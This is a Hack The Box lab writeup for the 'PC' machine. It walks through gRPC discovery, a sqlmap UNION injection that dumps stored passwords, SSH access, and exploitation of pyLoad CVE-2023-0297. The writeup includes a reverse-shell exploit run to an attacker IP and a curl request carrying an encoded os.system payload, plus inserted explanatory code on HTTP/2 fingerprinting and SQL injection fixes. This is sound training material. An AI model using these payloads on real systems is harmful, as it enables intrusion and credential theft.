[Hack The Box] PC writeup
The level is easy, but it had an unfamiliar port and tools I was using for the first time, such as grpcUI, so it was a good learning experience.
Including the OSINT part, it's a machine I'd recommend to HTB beginners.
openvpn
┌──(kali㉿kali)-[~]
└─$ sudo openvpn /home/kali/Downloads/lab_ryotaromosao.ovpn
[sudo] kali のパスワード:
2023-12-07 18:54:52 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set.
2023-12-07 18:54:52 Note: --data-cipher-fallback with cipher 'AES-128-CBC' disables data channel offload.
2023-12-07 18:54:52 OpenVPN 2.6.3 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] [DCO]
2023-12-07 18:54:52 library versions: OpenSSL 3.0.9 30 May 2023, LZO 2.10
USER PRIVILEGES
nmap
- For port scanning I almost always use these options
- To speed up the scan I use -T4 and --min-rate 10000
┌──(kali㉿kali)-[~]
└─$ sudo nmap -n -v -T4 --min-rate 10000 10.10.11.214 -sSV -Pn
[sudo] kali のパスワード:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-07 19:03 JST
NSE: Loaded 46 scripts for scanning.
Initiating SYN Stealth Scan at 19:03
Scanning 10.10.11.214 [1000 ports]
Discovered open port 22/tcp on 10.10.11.214
Completed SYN Stealth Scan at 19:03, 2.34s elapsed (1000 total ports)
Initiating Service scan at 19:03
Scanning 1 service on 10.10.11.214
Completed Service scan at 19:03, 0.52s elapsed (1 service on 1 host)
NSE: Script scanning 10.10.11.214.
Initiating NSE at 19:03
Completed NSE at 19:03, 0.00s elapsed
Initiating NSE at 19:03
Completed NSE at 19:03, 0.00s elapsed
Nmap scan report for 10.10.11.214
Host is up (0.25s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- On HTB it's unusual for only port 22 to be open... let's try a full port scan first
- A full port scan can be done with -p-
┌──(kali㉿kali)-[~]
└─$ sudo nmap -n -v -T4 --min-rate 10000 10.10.11.214 -sSV -Pn -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-07 19:10 JST
NSE: Loaded 46 scripts for scanning.
Initiating SYN Stealth Scan at 19:10
Scanning 10.10.11.214 [65535 ports]
Discovered open port 22/tcp on 10.10.11.214
Discovered open port 50051/tcp on 10.10.11.214
Completed SYN Stealth Scan at 19:10, 14.58s elapsed (65535 total ports)
Initiating Service scan at 19:10
Scanning 2 services on 10.10.11.214
Completed Service scan at 19:10, 20.51s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.11.214.
Initiating NSE at 19:10
Completed NSE at 19:10, 0.01s elapsed
Initiating NSE at 19:10
Completed NSE at 19:10, 0.52s elapsed
Nmap scan report for 10.10.11.214
Host is up (0.30s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
50051/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port50051-TCP:V=7.94%I=7%D=12/7%Time=65719A16%P=x86_64-pc-linux-gnu%r(N
SF:ULL,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\x0
SF:6\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(Generic
SF:Lines,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\
SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(GetRe
SF:quest,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\
SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(HTTPO
SF:ptions,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0
SF:\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(RTSP
SF:Request,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\
SF:0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(RPC
SF:Check,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\
SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(DNSVe
SF:rsionBindReqTCP,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\
SF:xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0
SF:")%r(DNSStatusRequestTCP,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0
SF:\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\
SF:0\0\?\0\0")%r(Help,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0
SF:\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\
SF:0\0")%r(SSLSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x0
SF:5\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0
SF:\?\0\0")%r(TerminalServerCookie,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xf
SF:f\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0
SF:\0\0\0\0\0\?\0\0")%r(TLSSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?
SF:\xff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x0
SF:8\0\0\0\0\0\0\?\0\0")%r(Kerberos,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\x
SF:ff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\
SF:0\0\0\0\0\0\?\0\0")%r(SMBProgNeg,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\x
SF:ff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\
SF:0\0\0\0\0\0\?\0\0")%r(X11Probe,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff
SF:\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\
SF:0\0\0\0\0\?\0\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- What is port 50051!? It looks suspicious, so let's investigate
- Port 80 is usually open, so while I look over the website I normally run ffuf for directory and subdomain enumeration, but this time I didn't
- Reference [https://zenn.dev/k88t76/books/f3892660871ab2/viewer/254bd9]
"We'll implement server.go, which starts the gRPC server. This time we'll run the gRPC server on 50051, gRPC's default port."
What is gRPC
In gRPC, a client application can directly call a method on a server application on a different machine as if it were a local object, making it easier for you to create distributed applications and services. As in many RPC systems, gRPC is based around the idea of defining a service, specifying the methods that can be called remotely with their parameters and return types. On the server side, the server implements this interface and runs a gRPC server to handle client calls. On the client side, the client has a stub (referred to as just a client in some languages) that provides the same methods as the server.
- gRPC is a protocol developed by Google; it is apparently based on a technique called RPC (Remote Procedure Call) and is used mainly for communication between microservices (server to server).
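The fingerprint nmap printed above is actually enough to identify the service before reaching for grpcUI: the 46 bytes (length 2E) that port 50051 returns to every probe are an HTTP/2 server connection preface, a SETTINGS frame followed by a WINDOW_UPDATE frame, which is exactly what a cleartext gRPC (h2c) server sends the moment a client connects. The decoder below is an added example and not part of the writeup; the byte string is constructed from the fingerprint above, and the frame-type and setting names are taken from RFC 9113.

```python
import struct

# Constructed from the nmap fingerprint above: the 46-byte (0x2E) reply that
# port 50051 returned to every probe.
FINGERPRINT = (
    b"\x00\x00\x18\x04\x00\x00\x00\x00\x00"   # SETTINGS frame header, 24-byte payload, stream 0
    b"\x00\x04\x00\x3f\xff\xff"               # INITIAL_WINDOW_SIZE = 0x3fffff
    b"\x00\x05\x00\x3f\xff\xff"               # MAX_FRAME_SIZE      = 0x3fffff
    b"\x00\x06\x00\x00\x20\x00"               # MAX_HEADER_LIST_SIZE = 8192
    b"\xfe\x03\x00\x00\x00\x01"               # non-standard setting id 0xfe03 = 1
    b"\x00\x00\x04\x08\x00\x00\x00\x00\x00"   # WINDOW_UPDATE frame header, 4-byte payload
    b"\x00\x3f\x00\x00"                       # window increment = 0x3f0000
)

# Frame types and SETTINGS identifiers from RFC 9113.
FRAME_TYPES = {0x0: "DATA", 0x1: "HEADERS", 0x2: "PRIORITY", 0x3: "RST_STREAM",
               0x4: "SETTINGS", 0x5: "PUSH_PROMISE", 0x6: "PING", 0x7: "GOAWAY",
               0x8: "WINDOW_UPDATE", 0x9: "CONTINUATION"}
SETTINGS_NAMES = {1: "HEADER_TABLE_SIZE", 2: "ENABLE_PUSH", 3: "MAX_CONCURRENT_STREAMS",
                  4: "INITIAL_WINDOW_SIZE", 5: "MAX_FRAME_SIZE", 6: "MAX_HEADER_LIST_SIZE"}


def parse_settings(payload: bytes) -> dict:
    """Decode a SETTINGS payload: a sequence of 16-bit id / 32-bit value pairs."""
    if len(payload) % 6:
        raise ValueError("SETTINGS payload length must be a multiple of 6")
    return {SETTINGS_NAMES.get(ident, f"UNKNOWN_{ident:#06x}"): value
            for ident, value in struct.iter_unpack(">HI", payload)}


def parse_frames(data: bytes) -> list:
    """Split raw bytes into HTTP/2 frames (9-byte header + payload)."""
    frames, off = [], 0
    while off < len(data):
        if off + 9 > len(data):
            raise ValueError("truncated frame header")
        length = int.from_bytes(data[off:off + 3], "big")
        ftype, flags = data[off + 3], data[off + 4]
        stream_id = int.from_bytes(data[off + 5:off + 9], "big") & 0x7FFFFFFF
        payload = data[off + 9:off + 9 + length]
        if len(payload) != length:
            raise ValueError("truncated frame payload")
        frame = {"type": FRAME_TYPES.get(ftype, f"UNKNOWN_{ftype:#x}"),
                 "flags": flags, "stream": stream_id, "length": length}
        if ftype == 0x4:
            frame["settings"] = parse_settings(payload)
        elif ftype == 0x8:
            frame["increment"] = int.from_bytes(payload, "big") & 0x7FFFFFFF
        frames.append(frame)
        off += 9 + length
    return frames


def looks_like_h2c_server(data: bytes) -> bool:
    """An HTTP/2 server must open with a SETTINGS frame on stream 0 (RFC 9113 section 3.4)."""
    try:
        frames = parse_frames(data)
    except ValueError:
        return False
    return bool(frames) and frames[0]["type"] == "SETTINGS" and frames[0]["stream"] == 0


if __name__ == "__main__":
    for frame in parse_frames(FINGERPRINT):
        print(frame)
    print("h2c server preface:", looks_like_h2c_server(FINGERPRINT))
```

The tell is that the server speaks first and sends SETTINGS regardless of what the probe contained (NULL, GetRequest, Kerberos, X11 all get the identical 2E-byte reply), so a rule like `looks_like_h2c_server` on the first bytes received is a cheap way to tag unknown ports as HTTP/2/gRPC in your own scan post-processing.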
- After searching around I found grpcUI, a tool for accessing gRPC servers
go install github.com/fullstorydev/grpcui/cmd/grpcui@latest
- Set Go's environment variables so that GOPATH is inside the HOME directory
export GOPATH=$HOME/go
export PATH=$PATH:$GOPATH/bin
┌──(kali㉿kali)-[/home/kali.org/Machine/PC]
└─$ grpcui -plaintext 10.10.11.214:50051
gRPC Web UI available at http://127.0.0.1:41631/
libva error: vaGetDriverNameByIndex() failed with unknown libva error, driver_name = (null)
[20537:20537:1209/001846.801029:ERROR:policy_logger.cc(157)] :components/enterprise/browser/controller/chrome_browser_cloud_management_controller.cc(163) Cloud management controller initialization aborted as CBCM is not enabled.
tracing_subscriber - init success
There were a registration screen, a login screen and a GetInfo screen
First, let's register
Logging in returned a token and an ID
Presumably GetInfo returns the information tied to that token and ID
- Let's take a look in Burp Suite at this point
- I tried various things but got nothing useful... the only thing I could think of was SQL injection, so I'll try sqlmap
- Save the request with copy to file
sqlmap
A technique I always use: you can look up a command's detailed options with -h, but curl cheat.sh/*** is highly recommended (I learned this from Sasaki-san at the HTB study session hosted by stone beat security)
┌──(kali㉿kali)-[/home/kali.org]
└─$ curl cheat.sh/sqlmap
cheat:sqlmap
---
tags: [ database ]
---
# Test URL and POST data and return database banner (if possible)
./sqlmap.py --url="<url>" --data="<post-data>" --banner
# Parse request data and test | request data can be obtained with burp
./sqlmap.py -r <request-file> <options>
# Fingerprint | much more information than banner
./sqlmap.py -r <request-file> --fingerprint
# Get database username, name, and hostname
./sqlmap.py -r <request-file> --current-user --current-db --hostname
# Check if user is a database admin
./sqlmap.py -r <request-file> --is-dba
# Get database users and password hashes
./sqlmap.py -r <request-file> --users --passwords
# Enumerate databases
./sqlmap.py -r <request-file> --dbs
# List tables for one database
./sqlmap.py -r <request-file> -D <db-name> --tables
# Other database commands
./sqlmap.py -r <request-file> -D <db-name> --columns
--schema
--count
# Enumeration flags
./sqlmap.py -r <request-file> -D <db-name>
-T <tbl-name>
-C <col-name>
-U <user-name>
# Extract data
./sqlmap.py -r <request-file> -D <db-name> -T <tbl-name> -C <col-name> --dump
# Execute SQL Query
./sqlmap.py -r <request-file> --sql-query="<sql-query>"
# Append/Prepend SQL Queries
./sqlmap.py -r <request-file> --prefix="<sql-query>" --suffix="<sql-query>"
# Get backdoor access to sql server | can give shell access
./sqlmap.py -r <request-file> --os-shell
tldr:sqlmap
# sqlmap
# Detect and exploit SQL injection flaws.
# More information: <https://sqlmap.org>.
# Run sqlmap against a single target URL:
python sqlmap.py -u "http://www.target.com/vuln.php?id=1"
# Send data in a POST request (`--data` implies POST request):
python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1"
# Change the parameter delimiter (& is the default):
python sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" --param-del=";"
# Select a random `User-Agent` from `./txt/user-agents.txt` and use it:
python sqlmap.py -u "http://www.target.com/vuln.php" --random-agent
# Provide user credentials for HTTP protocol authentication:
python sqlmap.py -u "http://www.target.com/vuln.php" --auth-type Basic --auth-cred "testuser:testpass"
The command I actually ran is this
┌──(kali㉿kali)-[~/Documents]
└─$ sqlmap -r pc-1.req --dump
___
__H__
___ ___[.]_____ ___ ___ {1.7.11#stable}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 00:50:02 /2023-12-09/
[00:50:02] [INFO] parsing HTTP request from 'pc-1.req'
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
Cookie parameter '_grpcui_csrf_token' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] N
[00:50:05] [INFO] resuming back-end DBMS 'sqlite'
[00:50:05] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: JSON id ((custom) POST)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdCIsImV4cCI6MTcwMjAxNjc3OX0.xksCZGKuWgviU3LIK2NEez0MBPe5Y9m5fb6BSXy0EaY"}],"data":[{"id":"111 UNION ALL SELECT CHAR(113,122,106,118,113)||CHAR(117,86,79,116,77,84,104,81,116,71,115,114,65,89,109,105,81,66,114,122,68,72,116,80,84,72,81,69,85,81,109,76,117,100,67,110,79,117,84,109)||CHAR(113,122,112,107,113)-- wPsd"}]}
---
[00:50:06] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[00:50:06] [INFO] fetching tables for database: 'SQLite_masterdb'
[00:50:06] [INFO] fetching columns for table 'accounts'
[00:50:06] [INFO] fetching entries for table 'accounts'
Database: <current>
Table: accounts
[2 entries]
+------------------------+----------+
| password | username |
+------------------------+----------+
| admin | admin |
| HereIsYourPassWord1431 | sau |
+------------------------+----------+
[00:50:06] [INFO] table 'SQLite_masterdb.accounts' dumped to CSV file '/home/kali/.local/share/sqlmap/output/127.0.0.1/dump/SQLite_masterdb/accounts.csv'
[00:50:06] [INFO] fetching columns for table 'messages'
[00:50:06] [INFO] fetching entries for table 'messages'
Database: <current>
Table: messages
[1 entry]
+----+----------------------------------------------+----------+
| id | message | username |
+----+----------------------------------------------+----------+
| 1 | The admin is working hard to fix the issues. | admin |
+----+----------------------------------------------+----------+
[00:50:06] [INFO] table 'SQLite_masterdb.messages' dumped to CSV file '/home/kali/.local/share/sqlmap/output/127.0.0.1/dump/SQLite_masterdb/messages.csv'
[00:50:06] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/127.0.0.1'
[*] ending @ 00:50:06 /2023-12-09/
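What sqlmap found is a UNION-based injection in the `id` field of a SQLite query behind GetInfo: the original SELECT has three columns, so a three-column UNION pasted into `id` appends rows from `accounts` to the response. The miniature below is an added example, not the machine's code: it recreates the dumped schema with constructed sample rows (the secrets are placeholders), shows the string-concatenation pattern that makes this possible, and puts the parameterized, type-checked version beside it.

```python
import sqlite3

# Constructed sample data mirroring the schema sqlmap dumped above (accounts,
# messages); the password values are placeholders, not the machine's.
SAMPLE_ACCOUNTS = [("admin", "constructed-admin-password"),
                   ("sau", "constructed-sample-password")]
SAMPLE_MESSAGES = [(1, "The admin is working hard to fix the issues.", "admin")]

# Constructed input of the same shape as sqlmap's UNION payload: the original
# query returns three columns, so the injected SELECT must supply three too.
UNION_PAYLOAD = "0 UNION ALL SELECT username, password, NULL FROM accounts -- "


def build_db() -> sqlite3.Connection:
    """In-memory SQLite database with the two tables seen in the dump."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    conn.execute("CREATE TABLE messages (id INTEGER PRIMARY KEY, message TEXT, username TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)", SAMPLE_ACCOUNTS)
    conn.executemany("INSERT INTO messages VALUES (?, ?, ?)", SAMPLE_MESSAGES)
    conn.commit()
    return conn


def get_info_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """Vulnerable pattern: the client-controlled id is pasted into the SQL text,
    so a value like UNION_PAYLOAD rewrites the query and reads other tables."""
    sql = "SELECT id, message, username FROM messages WHERE id = " + user_id
    return conn.execute(sql).fetchall()


def get_info_safe(conn: sqlite3.Connection, user_id: str) -> list:
    """Hardened form: validate the type, then bind the value as a parameter.
    The driver passes the value separately from the SQL text, so it is never
    parsed as SQL; the int() check additionally rejects junk before the query."""
    try:
        id_int = int(user_id)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer") from None
    return conn.execute(
        "SELECT id, message, username FROM messages WHERE id = ?", (id_int,)
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, normal id:", get_info_vulnerable(db, "1"))
    print("vulnerable, payload  :", get_info_vulnerable(db, UNION_PAYLOAD))
    print("safe, normal id      :", get_info_safe(db, "1"))
    try:
        get_info_safe(db, UNION_PAYLOAD)
    except ValueError as exc:
        print("safe, payload        : rejected ->", exc)
```

Running it, the vulnerable function returns both `accounts` rows for the payload while the safe one raises before touching the database. The same fix applies whatever the transport: a gRPC handler that builds SQL from a request field is no safer than a PHP page doing it, and grpcui only made the field easy to reach.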
Got a user and password! Let's connect over SSH
ssh
┌──(kali㉿kali)-[/home/kali.org]
└─$ ssh sau@10.10.11.214
sau@10.10.11.214's password:
Last login: Fri Dec 8 15:53:02 2023 from 10.10.14.13
sau@pc:~$ ls
user.txt
Got user.txt!
PRIVILEGE ESCALATION
sudo -l
First, check whether there are any files the user (sau) can run with root privileges
sau@pc:~$ sudo -l
[sudo] password for sau:
Sorry, user sau may not run sudo on localhost.
Doesn't look like it...
Linpeas
LinPEAS is a tool that automatically collects misconfigurations and information that could lead to privilege escalation on Linux. Nobody who does penetration testing is unaware of it.
However, it outputs a lot of information, so you need experience to use it well (I'm not at all confident myself).
Linux local Privilege Escalation Awesome Script (linPEAS) is a script that searches for possible paths to escalate privileges on Linux/Unix hosts.
Then I found the Active Ports section.
It seems various ports other than 50051 are open, so let's access them.
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:9666 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::50051 :::* LISTEN -
Look up how to use ssh with curl cheat.sh/ssh
ssh -L
┌──(kali㉿kali)-[/home/kali.org]
└─$ curl cheat.sh/ssh
cheat.sheets:ssh
# ssh
# OpenSSH SSH client (remote login program)
# SSH tunneling: Forward a specific port (`localhost:9999` to `example.org:80`) along with disabling pseudo-[T]ty allocation and executio[N] of remote commands:
ssh -L 9999:example.org:80 -N -T username@remote_host
┌──(kali㉿kali)-[/home/kali.org]
└─$ ssh -L 1234:localhost:8000 sau@10.10.11.214
sau@10.10.11.214's password:
Last login: Fri Dec 8 15:54:19 2023 from 10.10.14.13
sau@pc:~$
With the above command I forwarded 10.10.11.214:8000 (the target machine) to localhost:1234
pyLoad
Let's look into pyLoad. pyLoad is
pyLoad was developed to run on NAS, next-gen routers and headless home servers, whatever device able to connect to internet and supporting the Python programming language, so it's available for all kind of operating systems and a wide range of hardware platforms; you can even install on your PC or Mac if you want and control it entirely by web in the same way.
apparently.
Searching for pyLoad exploits with queries like "pyLoad PoC github" turned up this article.
It's an RCE vulnerability, and the CVE was issued in 2023, so it's extremely suspicious (in fact, pretty much a certainty).
pyLoad Pre-auth RCE (CVE-2023-0297)
Let's try this exploit.py from my own machine first
┌──(kali㉿kali)-[/home/kali.org/Machine/PC/CVE-2023-0297]
└─$ python3 exploit.py -t localhost:1234 -I 10.10.14.13 -P 4444
[SUCCESS] Running reverse shell. Check your listener!
^CTraceback (most recent call last):
File "/home/kali.org/Machine/PC/CVE-2023-0297/exploit.py", line 105, in <module>
main()
File "/home/kali.org/Machine/PC/CVE-2023-0297/exploit.py", line 90, in main
exploit.execute_command(reverse_shell)
File "/home/kali.org/Machine/PC/CVE-2023-0297/exploit.py", line 52, in execute_command
response = requests.post(url, data=data, proxies=self.proxies)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/requests/api.py", line 115, in post
return request("post", url, data=data, json=json, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/requests/api.py", line 59, in request
return session.request(method=method, url=url, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 587, in request
resp = self.send(prep, **send_kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 701, in send
r = adapter.send(request, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/requests/adapters.py", line 489, in send
resp = conn.urlopen(
^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 704, in urlopen
httplib_response = self._make_request(
^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 450, in _make_request
six.raise_from(e, None)
File "<string>", line 3, in raise_from
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 445, in _make_request
httplib_response = conn.getresponse()
^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/http/client.py", line 1378, in getresponse
response.begin()
File "/usr/lib/python3.11/http/client.py", line 318, in begin
version, status, reason = self._read_status()
^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/http/client.py", line 279, in _read_status
line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/socket.py", line 706, in readinto
return self._sock.recv_into(b)
^^^^^^^^^^^^^^^^^^^^^^^
KeyboardInterrupt
┌──(kali㉿kali)-[/home/kali.org/Machine/PC]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
Hmm, the reverse shell doesn't come back
Next, let's fire it from the target machine side
sau@pc:/tmp$ python3 exploit.py -t localhost:8000 -I 10.10.14.13 -P 4444
Traceback (most recent call last):
File "exploit.py", line 10, in <module>
import requests
File "/usr/lib/python3/dist-packages/requests/__init__.py", line 95, in <module>
from urllib3.contrib import pyopenssl
File "/usr/lib/python3/dist-packages/urllib3/contrib/pyopenssl.py", line 46, in <module>
import OpenSSL.SSL
File "/usr/lib/python3/dist-packages/OpenSSL/__init__.py", line 8, in <module>
from OpenSSL import crypto, SSL
File "/usr/lib/python3/dist-packages/OpenSSL/crypto.py", line 1553, in <module>
class X509StoreFlags(object):
File "/usr/lib/python3/dist-packages/OpenSSL/crypto.py", line 1573, in X509StoreFlags
CB_ISSUER_CHECK = _lib.X509_V_FLAG_CB_ISSUER_CHECK
AttributeError: module 'lib' has no attribute 'X509_V_FLAG_CB_ISSUER_CHECK'
Error in sys.excepthook:
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/apport_python_hook.py", line 72, in apport_excepthook
from apport.fileutils import likely_packaged, get_recent_crashes
File "/usr/lib/python3/dist-packages/apport/__init__.py", line 5, in <module>
from apport.report import Report
File "/usr/lib/python3/dist-packages/apport/report.py", line 32, in <module>
import apport.fileutils
File "/usr/lib/python3/dist-packages/apport/fileutils.py", line 12, in <module>
import os, glob, subprocess, os.path, time, pwd, sys, requests_unixsocket
File "/usr/lib/python3/dist-packages/requests_unixsocket/__init__.py", line 1, in <module>
import requests
File "/usr/lib/python3/dist-packages/requests/__init__.py", line 95, in <module>
from urllib3.contrib import pyopenssl
File "/usr/lib/python3/dist-packages/urllib3/contrib/pyopenssl.py", line 46, in <module>
import OpenSSL.SSL
File "/usr/lib/python3/dist-packages/OpenSSL/__init__.py", line 8, in <module>
from OpenSSL import crypto, SSL
File "/usr/lib/python3/dist-packages/OpenSSL/crypto.py", line 1553, in <module>
class X509StoreFlags(object):
File "/usr/lib/python3/dist-packages/OpenSSL/crypto.py", line 1573, in X509StoreFlags
CB_ISSUER_CHECK = _lib.X509_V_FLAG_CB_ISSUER_CHECK
AttributeError: module 'lib' has no attribute 'X509_V_FLAG_CB_ISSUER_CHECK'
Original exception was:
Traceback (most recent call last):
File "exploit.py", line 10, in <module>
import requests
File "/usr/lib/python3/dist-packages/requests/__init__.py", line 95, in <module>
from urllib3.contrib import pyopenssl
File "/usr/lib/python3/dist-packages/urllib3/contrib/pyopenssl.py", line 46, in <module>
import OpenSSL.SSL
File "/usr/lib/python3/dist-packages/OpenSSL/__init__.py", line 8, in <module>
from OpenSSL import crypto, SSL
File "/usr/lib/python3/dist-packages/OpenSSL/crypto.py", line 1553, in <module>
class X509StoreFlags(object):
File "/usr/lib/python3/dist-packages/OpenSSL/crypto.py", line 1573, in X509StoreFlags
CB_ISSUER_CHECK = _lib.X509_V_FLAG_CB_ISSUER_CHECK
AttributeError: module 'lib' has no attribute 'X509_V_FLAG_CB_ISSUER_CHECK'
┌──(kali㉿kali)-[/home/kali.org/Machine/PC]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
Still no luck. This kind of thing happens a lot on HTB, so I regrouped and tried the method in this article.
sau@pc:/tmp$ curl -i -s -k -X $'POST' \
> -H $'Host: 127.0.0.1:8000' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 184' \
> --data-binary $'package=xxx&crypted=AAAA&jk=%70%79%69%6d%70%6f%72%74%20%6f%73%3b%6f%73%2e%73%79%73%74%65%6d%28%22%74%6f%75%63%68%20%2f%74%6d%70%2f%70%77%6e%64%22%29;f=function%20f2(){};&passwords=aaaa' \
> $'http://127.0.0.1:8000/flash/addcrypted2'
HTTP/1.1 500 INTERNAL SERVER ERROR
Content-Type: text/html; charset=utf-8
Content-Length: 21
Access-Control-Max-Age: 1800
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: OPTIONS, GET, POST
Vary: Accept-Encoding
Date: Fri, 08 Dec 2023 06:06:39 GMT
Server: Cheroot/8.6.0
According to the article, if it fires, touch /tmp/pwnd runs and creates the file, so let's check.
exploit.py
pwnd
pyLoad
snap-private-tmp
systemd-private-6b2ead31914b4c5c916dded28dfc3521-ModemManager.service-dsoEBg
systemd-private-6b2ead31914b4c5c916dded28dfc3521-systemd-logind.service-GJEqDi
